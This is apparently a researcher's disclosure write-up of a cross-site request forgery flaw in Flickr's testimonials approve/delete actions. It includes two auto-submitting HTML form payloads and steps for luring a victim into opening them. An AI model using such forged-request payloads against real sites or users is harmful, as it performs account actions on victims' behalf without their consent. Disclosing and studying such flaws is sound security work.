Hello, Did you hear about testimonials feature in Flickr? .. mmmmm maybe 🙂

Overview:

Simply testimonials function give you ability to write testimonials/comments about Flickr user then he approve for displaying your testimonials in his profile page or he can delete it (In case he didn’t like it ^_^)

What we have here:

We have a CSRF vulnerability in  testimonials Approve/Delete actions. So the impact analysis here is an attacker can use CSRF vulnerability to approve and delete users testimonials because there is no “magic_cookie” which protect from CSRF in Flickr.

POC/Steps:

1. write a testimonial for any account from here “https://www.flickr.com/testimonials_write.gne?id=[UserID]” (Change [UserID] in the previous link to victim id)

2. The victim must approved for Testimonial before it displayed in his profile page. To make this action the following CSRF payload can do it.  (change the testimonial Id)

<html>
<body onload=”D1.submit();”>
<form id=”D1″ action=”https://www.flickr.com/testimonials_manage.gne” method=”POST”>
<input type=”hidden” name=”approve_72157648695059941″ value=”APPROVE” />
</form>
</body>
</html>

3. Send the payload to the victim when he open it just check his profile page you will find what you wrote in step 1.

4. To delete a testimonials … the following CSRF payload can do it. (change the testimonial Id):

<html>
<body onload=”D1.submit();”>
<form id=”D1″ action=”https://www.flickr.com/testimonials_manage.gne” method=”POST”>
<input type=”hidden” name=”delete_72157648695059941″ value=”DELETE” />
</form>
</body>
</html>

POC Video

Thanks,
Mohamed Maati
@MSM_1st
www.sculptordev.com